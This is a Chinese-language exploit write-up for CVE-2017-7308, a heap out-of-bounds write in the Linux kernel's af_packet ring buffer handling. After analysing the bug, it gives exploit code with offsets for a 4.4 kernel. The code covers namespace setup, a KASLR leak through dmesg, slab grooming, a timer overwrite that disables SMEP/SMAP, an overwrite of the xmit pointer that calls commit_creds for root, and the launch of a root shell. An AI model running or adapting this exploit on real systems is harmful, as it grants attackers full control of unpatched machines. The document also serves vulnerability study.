1. 前言

此漏洞存在于Linux Kernel 4.10.6以下的版本中,本文的测试环境为Ubuntu 14.04 LTS

$ git clone git://kernel.ubuntu.com/ubuntu/ubuntu-trusty.git
$ git checkout Ubuntu-lts-4.4.0-31.50_14.04.1

2. 漏洞分析

漏洞发生在net/packet/af_packet.cpacket_set_ring函数中,此函数会在设置ring buffer时被调用,ring buffer是用于数据包处理的缓冲区,rx_ring是接收数据的缓冲区,tx_ring是传输数据的缓冲区,本文用到rx_ring,分别可以通过setsockoptPACKET_RX_RINGPACKET_TX_RING参数进行设置, packet_ring_buffer定义如下:

struct packet_ring_buffer {
    struct pgv *pg_vec;
    struct tpacket_kbdq_core prb_bdqc;
}

struct pgv {
    char *buffer;
}

1.png-17kB

接下来看导致漏洞的代码

if (po->tp_version >= TPACKET_V3 &&
	(int)(req->tp_block_size -
	  BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)
	goto out;

PACKET_VERSIONTPACKET_V3时,(int)(req->tp_block_size - BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)会由于符号问题能够绕过这个检测,例如:

A = req->tp_block_size = 4096 = 0x1000
B = req_u->req3.tp_sizeof_priv = (1 << 31) + 4096 = 0x80001000
BLK_PLUS_PRIV(B) = (1 << 31) + 4096 + 48 = 0x80001030
A - BLK_PLUS_PRIV(B) = 0x1000 - 0x80001030 = 0x7fffffd0
(int)0x7fffffd0 = 0x7fffffd0 > 0

这样就会在之后导致一系列问题,在init_prb_bdqc函数中

static void init_prb_bdqc(struct packet_sock *po,
			struct packet_ring_bufferpacket_lookup_frame_in_block *rb,
			struct pgv *pg_vec,
			union tpacket_req_u *req_u)
{
	struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
	struct tpacket_block_desc *pbd;

	memset(p1, 0x0, sizeof(*p1));

	p1->knxt_seq_num = 1;
	p1->pkbdq = pg_vec;
	pbd = (struct tpacket_block_desc *)pg_vec[0].buffer;
	p1->pkblk_start	= pg_vec[0].buffer;
	p1->kblk_size = req_u->req3.tp_block_size;
	p1->knum_blocks	= req_u->req3.tp_block_nr;
	...
	p1->blk_sizeof_priv = req_u->req3.tp_sizeof_priv;

	p1->max_frame_len = p1->kblk_size - BLK_PLUS_PRIV(p1->blk_sizeof_priv);
	prb_init_ft_ops(p1, req_u);
	prb_setup_retire_blk_timer(po);
	prb_open_block(p1, pbd);
}

p1->blk_sizeof_priv的类型为unsigned short,而req_u->req3.tp_sizeof_priv的类型为unsigned int,在转换后只会取低两个字节的值,由于之前的检测绕过问题这里可以给p1->blk_sizeof_priv赋任意值,这样如果BLK_PLUS_PRIV(p1->blk_sizeof_priv) > p1->kblk_size就可以把p1->max_frame_len赋值为一个很大的值来绕过很多检测,在之后的prb_open_block函数中

static void prb_open_block(struct tpacket_kbdq_core *pkc1,
	struct tpacket_block_desc *pbd1)
{
    ...
	pkc1->pkblk_start = (char *)pbd1;
	pkc1->nxt_offset = pkc1->pkblk_start + BLK_PLUS_PRIV(pkc1->blk_sizeof_priv);
    ...
}

pkc1->nxt_offset指向缓冲区ring_bufferblock当前可接收数据的起始地址,由于pkc1->blk_sizeof_priv可控,因此可以控制pkc1->nxt_offset在接收数据包时造成堆越界。

3. 漏洞利用

EXP参考https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c,由于测试环境的内核版本是4.4,因此需要修改几处偏移。主要思路是通过堆越界覆盖packet_sock结构体中的成员packet_sock->xmitpacket_sock->rx_ring->prb_bdqc->retire_blk_timer,因此进行堆布局构造连续的多个packet_sock结构体使前一个packet_sock->rx_ring->prb_bdqc->nxt_offset指向后面的packet_sock结构体的上面两个成员。

3.1 安装沙盒

要对更底层的网络进行操作,需要有CAP_NET_RAW权限,可以通过网络命名空间来实现,编译内核时需要开启CONFIG_USER_NS=y

void setup_sandbox() {
    int real_uid = getuid();
    int real_gid = getgid();

        if (unshare(CLONE_NEWUSER) != 0) {
        perror("[-] unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }

        if (unshare(CLONE_NEWNET) != 0) {
        perror("[-] unshare(CLONE_NEWNET)");
        exit(EXIT_FAILURE);
    }

    if (!write_file("/proc/self/setgroups", "deny")) {
        perror("[-] write_file(/proc/self/set_groups)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){
        perror("[-] write_file(/proc/self/uid_map)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
        perror("[-] write_file(/proc/self/gid_map)");
        exit(EXIT_FAILURE);
    }

    cpu_set_t my_set;
    CPU_ZERO(&my_set);
    CPU_SET(0, &my_set);
    if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
        perror("[-] sched_setaffinity()");
        exit(EXIT_FAILURE);
    }

    if (system("/sbin/ifconfig lo up") != 0) {
        perror("[-] system(/sbin/ifconfig lo up)");
        exit(EXIT_FAILURE);
    }
}

3.2 绕过KASLR

由于没有对dmesg做限制,因此会有残留的syslog能够泄漏出内核地址

$ dmesg | grep 'Freeing SMP'
[    0.022785] Freeing SMP alternatives memory: 28K (ffffffff81e83000 - ffffffff81e8a000)

3.3 堆布局

packet_sock结构体会在用户层创建socket时在内核创建,它通过kmalloc分配空间,kmalloc底层通过slab allocator进行分配,而为了提升性能减少重复的申请和释放,会用多个slab组成一个对应特定大小的缓存,在释放操作时并不会真正的释放,而是放入缓存修改成未使用状态,等下一次有相同大小的内存申请时直接从缓存返回,而不需要再次真正的申请物理内存,大小为2^n4.4版本内核的packet_sock大小为1408

$ pahole -C packet_sock src/ubuntu-trusty/vmlinux
struct packet_sock {
	struct sock                sk;                   /*     0   704 */
	/* --- cacheline 11 boundary (704 bytes) --- */
	struct packet_fanout *     fanout;               /*   704     8 */
	union tpacket_stats_u      stats;                /*   712    12 */

	/* XXX 4 bytes hole, try to pack */

	struct packet_ring_buffer  rx_ring;              /*   728   232 */
	/* --- cacheline 15 boundary (960 bytes) --- */
	struct packet_ring_buffer  tx_ring;              /*   960   232 */
	/* --- cacheline 18 boundary (1152 bytes) was 40 bytes ago --- */
	int                        copy_thresh;          /*  1192     4 */
	spinlock_t                 bind_lock;            /*  1196     4 */
	struct mutex               pg_vec_lock;          /*  1200    40 */
	/* --- cacheline 19 boundary (1216 bytes) was 24 bytes ago --- */
	unsigned int               running:1;            /*  1240:31  4 */
	unsigned int               auxdata:1;            /*  1240:30  4 */
	unsigned int               origdev:1;            /*  1240:29  4 */
	unsigned int               has_vnet_hdr:1;       /*  1240:28  4 */

	/* XXX 28 bits hole, try to pack */

	int                        pressure;             /*  1244     4 */
	int                        ifindex;              /*  1248     4 */
	__be16                     num;                  /*  1252     2 */

	/* XXX 2 bytes hole, try to pack */

	struct packet_rollover *   rollover;             /*  1256     8 */
	struct packet_mclist *     mclist;               /*  1264     8 */
	atomic_t                   mapped;               /*  1272     4 */
	enum tpacket_versions      tp_version;           /*  1276     4 */
	/* --- cacheline 20 boundary (1280 bytes) --- */
	unsigned int               tp_hdrlen;            /*  1280     4 */
	unsigned int               tp_reserve;           /*  1284     4 */
	unsigned int               tp_loss:1;            /*  1288:31  4 */
	unsigned int               tp_tx_has_off:1;      /*  1288:30  4 */

	/* XXX 30 bits hole, try to pack */

	unsigned int               tp_tstamp;            /*  1292     4 */
	struct net_device *        cached_dev;           /*  1296     8 */
	int                        (*xmit)(struct sk_buff *); /*  1304     8 */

	/* XXX 32 bytes hole, try to pack */

	/* --- cacheline 21 boundary (1344 bytes) --- */
	struct packet_type         prot_hook;            /*  1344    56 */

	/* size: 1408, cachelines: 22, members: 27 */
	/* sum members: 1362, holes: 3, sum holes: 38 */
	/* bit holes: 2, sum bit holes: 58 bits */
	/* padding: 8 */
};

因此1024 < 1408 < 2048packet_sock会使用kmalloc-2048缓存,这个缓冲使用0x8000大小的slab,这样先申请512socket使kmalloc-2048缓存耗尽,再创建一个有1024个块大小为0x8000ring_bufferpacket_sock,申请block会使page allocatorfreelist中的相应大小的页耗尽,因为申请物理页的大小也是按2^n计算,这样之后再申请就会从第一个大于nmfreelist中不为空的2^m大小的页中分割内存

#define KMALLOC_PAD 512
#define PAGEALLOC_PAD 1024

kmalloc_pad(KMALLOC_PAD);
pagealloc_pad(PAGEALLOC_PAD);

3.4 绕过SMEP和SMAP

完成预热后申请一个packet_sock并且设置一个有两个块大小为0x8000ring_buffer,再申请多个连续的packet_sock,由于kmalloc-2048缓存和freelist中相应大小的页中都已耗尽,这样它们会有很大机会在更大的页上被连续得分配

2.png-18.7kB

绕过SMEPSMAP只需把CR4寄存器的第2021位赋值为0

3.png-28.4kB

具体代码如下:

#define NATIVE_WRITE_CR4 0x61220ul
#define CR4_DESIRED_VALUE 0x407f0ul
#define TIMER_OFFSET 880

int oob_setup(int offset) {
    unsigned int maclen = ETH_HDR_LEN;
    unsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN +
                (maclen < 16 ? 16 : maclen));
    unsigned int macoff = netoff - maclen;
    unsigned int sizeof_priv = (1u<<31) + (1u<<30) +
        0x8000 - BLK_HDR_LEN - macoff + offset;
    return packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100);
}

void oob_timer_execute(void *func, unsigned long arg) {
    oob_setup(2048 + TIMER_OFFSET - 8);

    int i;
    for (i = 0; i < 32; i++) {
        int timer = packet_sock_kmalloc();
        packet_sock_timer_schedule(timer, 1000);
    }

    char buffer[2048];
    memset(&buffer[0], 0, sizeof(buffer));

    struct timer_list *timer = (struct timer_list *)&buffer[8];
    timer->function = func;
    timer->data = arg;
    timer->flags = 1;

    oob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);

    sleep(1);
}

oob_timer_execute((void *)(KERNEL_BASE + NATIVE_WRITE_CR4), CR4_DESIRED_VALUE);

这里是覆盖packet_sock->rx_ring->prb_bdqc->retire_blk_timer,由于会在retire timer超时后调用retire_blk_timer->function(retire_blk_timer->data),这样就可以通过native_write_cr4(X)来绕过SMEPSMAP。另外再说一下sizeof_priv的计算,tpacket接收数据包时会调用tpacket_rcv函数

static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
		       struct packet_type *pt, struct net_device *orig_dev)
{
    ...
    h.raw = packet_current_rx_frame(po, skb, TP_STATUS_KERNEL, (macoff+snaplen));
    ...
    skb_copy_bits(skb, 0, h.raw + macoff, snaplen);
    ...
}

static void *packet_current_rx_frame(struct packet_sock *po,
					    struct sk_buff *skb,
					    int status, unsigned int len)
{
	char *curr = NULL;
	switch (po->tp_version) {
    ...
	case TPACKET_V3:
		return __packet_lookup_frame_in_block(po, skb, status, len);
    ...
	}
}

static void *__packet_lookup_frame_in_block(struct packet_sock *po,
					    struct sk_buff *skb,
						int status,
					    unsigned int len
					    )
{
	struct tpacket_kbdq_core *pkc;
	struct tpacket_block_desc *pbd;
	char *curr, *end;

	pkc = GET_PBDQC_FROM_RB(&po->rx_ring);
	pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc);

	...
	curr = pkc->nxt_offset;
	pkc->skb = skb;
	end = (char *)pbd + pkc->kblk_size;

	/* first try the current block */
	if (curr+TOTAL_PKT_LEN_INCL_ALIGN(len) < end) {
		prb_fill_curr_block(curr, pkc, pbd, len);
		return (void *)curr;
	}

	/* Ok, close the current block */
	prb_retire_current_block(pkc, po, 0);

	/* Now, try to dispatch the next block */
	curr = (char *)prb_dispatch_next_block(pkc, po);
	if (curr) {
		pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc);
		prb_fill_curr_block(curr, pkc, pbd, len);
		return (void *)curr;
	}
    ...
}

static void *prb_dispatch_next_block(struct tpacket_kbdq_core *pkc,
		struct packet_sock *po)
{
    ...
	prb_open_block(pkc, pbd);
	return (void *)pkc->nxt_offset;
}

__packet_lookup_frame_in_block会返回当前缓冲区中可接收数据的起始地址,由于curr+TOTAL_PKT_LEN_INCL_ALIGN(len) < end,之后就会从第二个块中找空余的空间(这也是上面创建两个块的原因),blk_sizeof_priv = 0x8000 - BLK_HDR_LEN - macoff + 2048 + TIMER_OFFSET - 8会在计算p1->max_frame_len = p1->kblk_size - BLK_PLUS_PRIV(p1->blk_sizeof_priv)时使p1->max_frame_len为一个很大的值以此来绕过后面的一些检测,h.raw = pg_vec[1].buffer + blk_sizeof_priv + BLK_HDR_LEN = pg_vec[1].buffer - macoff + 2048 + TIMER_OFFSET - 8,调用skb_copy_bits(skb, 0, h.raw + macoff, snaplen)把数据复制到缓存区时的起始地址为pg_vec[1].buffer + 2048 + TIMER_OFFSET - 8,跳过后面紧跟的一个packet_sock,这样最终的复制起始地址为后面紧跟的第二个packet_sock + TIMER_OFFSET - 6(由于对齐导致是-6,为了把一些值置为0)

image.png-106.9kB

0xffff8800346c0b6a刚好在前面创建的32packet_sock

image.png-96kB

memcpy后成功覆盖了retire_blk_timer

image.png-41.4kB

3.5 提权

跟上一步类似只是这里覆盖packet_sockxmit函数指针,它会在发送数据时被调用,在关闭SMEP后返回到用户空间执行commit_creds(prepare_kernel_cred(0))实现提权

#define XMIT_OFFSET 1304

void oob_id_match_execute(void *func) {
    int s = oob_setup(2048 + XMIT_OFFSET - 64);

    int ps[32];

    int i;
    for (i = 0; i < 32; i++)
        ps[i] = packet_sock_kmalloc();

    char buffer[2048];
    memset(&buffer[0], 0, 2048);

    void **xmit = (void **)&buffer[64];
    *xmit = func;

    oob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2);

    for (i = 0; i < 32; i++)
        packet_sock_id_match_trigger(ps[i]);
}

oob_id_match_execute((void *)&get_root_payload);

3.6 恢复网络

由于隔离了网络命名空间,导致只有一个回环接口不能连接网络

image.png-105.5kB

但是现在是root权限,因此可以加入到init进程的网络命名空间来恢复网络

void exec_shell() {
    char *shell = "/bin/bash";
    char *args[] = {shell, "-i", NULL};
    
    int fd;
    
    fd = open("/proc/1/ns/net", O_RDONLY);
    if (fd == -1)
    {
        perror("error opening /proc/1/ns/net");
        exit(EXIT_FAILURE);
    }
    
    if (setns(fd, CLONE_NEWNET) == -1)
    {
        perror("error calling setns");
        exit(EXIT_FAILURE);
    }
    
    execve(shell, args, NULL);
}

image.png-208kB

4. 参考

  1. https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
  2. https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
  3. https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308
  4. http://blog.nsfocus.net/gdb-kgdb-debug-application/
  5. http://blackbunny.io/linux-kernel-x86-64-bypass-smep-kaslr-kptr_restric/